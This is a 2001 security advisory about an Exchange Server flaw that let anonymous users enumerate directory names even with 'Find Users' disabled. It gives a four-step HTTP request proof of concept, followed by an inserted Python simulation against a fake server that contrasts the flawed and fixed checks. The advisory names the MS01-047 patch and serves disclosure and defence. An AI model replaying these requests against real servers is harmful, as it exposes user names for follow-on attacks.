From: Aviram Jenik (aviramBEYONDSECURITY.COM)
Date: Fri Sep 07 2001 - 04:33:16 CDT


    The following security advisory is sent to the securiteam mailing list,
    and can be found at the SecuriTeam web site: http://www.securiteam.com

    SUMMARY

    Microsoft Exchange Server handles anonymous access to its Public Folders
    insecurely. Administrators may disable the "Find Users" feature to
    prevent anonymous users from enumerating existing user names, but a flaw
    in Exchange Server lets a remote attacker who can reach the server's
    anonymous Public Folders web interface run "Find Users" anyway.

    DETAILS

    The "Find Users" option of Microsoft Exchange's Public Folders web
    interface can be disabled. Doing so only hides the link to "Find Users";
    it does not stop a user from requesting the underlying ASP page
    (fumsg.asp) directly, so the search can still be run programmatically by
    anyone holding an anonymous session.

    Steps to recreate:
    1) Contact:
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com

    2) Access the redirected page, and resend the issued cookie.
    GET /exchange/logonfrm.asp HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    3) Access the redirected page, and resend the issued cookie.
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    4) Issue this request to obtain a list of users with the letter 'a' in
    their name (the DN field; e.g. Administrator):
    POST /exchange/finduser/fumsg.asp HTTP/1.1
    Host: www.example.com
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
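As an added example that is not part of the advisory and not Microsoft's code, the Python below replays the four-step session dance above against a small constructed stand-in for the OWA ASP pages. Only the paths, the cookie name and the form fields come from the request trace; the stand-in server, its directory entries, the session ID value and every function name are assumptions made for the example. It contrasts the flawed behaviour (the setting only hides the link, fumsg.asp still answers) with the check the fix needs (the setting enforced on the request itself).

```python
"""Added example: replays the anonymous-session sequence from the advisory
against a constructed stand-in server and shows why hiding a link is not
the same as enforcing the setting server-side."""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Paths and cookie name taken from the advisory's request trace.
ANON_ROOT = "/exchange/root.asp?acs=anon"
LOGON_FORM = "/exchange/logonfrm.asp"
FIND_USERS = "/exchange/finduser/fumsg.asp"
# Form fields in the order the advisory's POST body lists them.
FORM_FIELDS = ("DN", "FN", "LN", "TL", "AN", "CP", "DP", "OF", "CY", "ST", "CO")


@dataclass
class Response:
    status: int
    headers: dict
    body: str


class FakeOwaServer:
    """Constructed, hypothetical model of the OWA ASP pages (not Microsoft's code).

    find_users_enabled mirrors the administrator's setting.
    enforce_server_side=False reproduces the flaw (only the link is hidden);
    True models a fix that checks the setting on every fumsg.asp request."""

    def __init__(self, find_users_enabled: bool, enforce_server_side: bool):
        self.find_users_enabled = find_users_enabled
        self.enforce_server_side = enforce_server_side
        self.sessions = set()
        # Constructed directory entries for the example.
        self.directory = ["Administrator", "Alice Example", "Bob Sample", "Eve"]

    @staticmethod
    def _session_id(headers: dict) -> Optional[str]:
        m = re.search(r"ASPSESSIONID\w+=(\w+)", headers.get("Cookie", ""))
        return m.group(1) if m else None

    def handle(self, method: str, path: str, headers: dict, body: str = "") -> Response:
        sid = self._session_id(headers)
        if path == ANON_ROOT:
            if sid not in self.sessions:
                sid = "EABMCPIDGABPDJIKNOGBBPPN"  # constructed; same shape as the advisory's
                self.sessions.add(sid)
                return Response(302, {"Location": LOGON_FORM,
                                      "Set-Cookie": f"ASPSESSIONIDGGQGQGFW={sid}; path=/"}, "")
            link = '<a href="finduser/fumsg.asp">Find Users</a>' if self.find_users_enabled else ""
            return Response(200, {}, f"<html>Public Folders {link}</html>")
        if path == LOGON_FORM:
            return Response(302, {"Location": ANON_ROOT}, "")
        if path == FIND_USERS and method == "POST":
            if sid not in self.sessions:
                return Response(401, {}, "")
            # The fix: the setting must be checked on the request, not only in the UI.
            if self.enforce_server_side and not self.find_users_enabled:
                return Response(403, {}, "Find Users is disabled")
            needle = parse_qs(body, keep_blank_values=True).get("DN", [""])[0].lower()
            hits = [n for n in self.directory if needle and needle in n.lower()]
            return Response(200, {}, "\n".join(hits))
        return Response(404, {}, "")


def find_users_body(display_name: str) -> str:
    """Builds the fumsg.asp form body; only DN is filled, as in step 4 of the advisory."""
    return urlencode([(f, display_name if f == "DN" else "") for f in FORM_FIELDS])


def enumerate_users(server: FakeOwaServer, display_name: str) -> Response:
    """Steps 1-4: obtain an anonymous ASP session, then POST straight to fumsg.asp."""
    host = {"Host": "www.example.com"}
    r1 = server.handle("GET", ANON_ROOT, host)                      # step 1: cookie issued
    cookie = r1.headers["Set-Cookie"].split(";", 1)[0]
    with_cookie = dict(host, Cookie=cookie)
    r2 = server.handle("GET", r1.headers["Location"], with_cookie)  # step 2: follow redirect
    server.handle("GET", r2.headers["Location"], with_cookie)       # step 3: back to root.asp
    body = find_users_body(display_name)
    post_headers = dict(with_cookie, **{"Content-Type": "application/x-www-form-urlencoded",
                                        "Content-Length": str(len(body))})
    return server.handle("POST", FIND_USERS, post_headers, body)    # step 4: fumsg.asp


def link_visible(server: FakeOwaServer) -> bool:
    """Whether the root page still shows the Find Users link (all the admin sees)."""
    host = {"Host": "www.example.com"}
    r1 = server.handle("GET", ANON_ROOT, host)
    cookie = r1.headers["Set-Cookie"].split(";", 1)[0]
    return "Find Users" in server.handle("GET", ANON_ROOT, dict(host, Cookie=cookie)).body


if __name__ == "__main__":
    for label, srv in (("flawed", FakeOwaServer(False, False)),
                       ("fixed", FakeOwaServer(False, True))):
        r = enumerate_users(srv, "a")
        print(f"{label}: link visible={link_visible(srv)} status={r.status} body={r.body!r}")
```

With "Find Users" disabled the flawed server hides the link yet still returns every matching directory entry to the direct POST; the fixed server answers 403 because it consults the setting when fumsg.asp is requested, not when the link is rendered.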

    Vendor status:
    Microsoft was contacted on August 4, 2001. A security bulletin was
    released on September 7, 2001.

    Solution:
    Microsoft has released a patch for this problem. See Microsoft Security
    Bulletin MS01-047 for more information:
    <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>

    ADDITIONAL INFORMATION
    This security hole was discovered by Noam Rathaus
    <mailto:noamr@securiteam.com>.
    The information has been provided by SecuriTeam Experts
    <mailto:experts@securiteam.com>.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of
    any kind. In no event shall we be liable for any damages whatsoever
    including direct, indirect, incidental, consequential, loss of business
    profits or special damages.
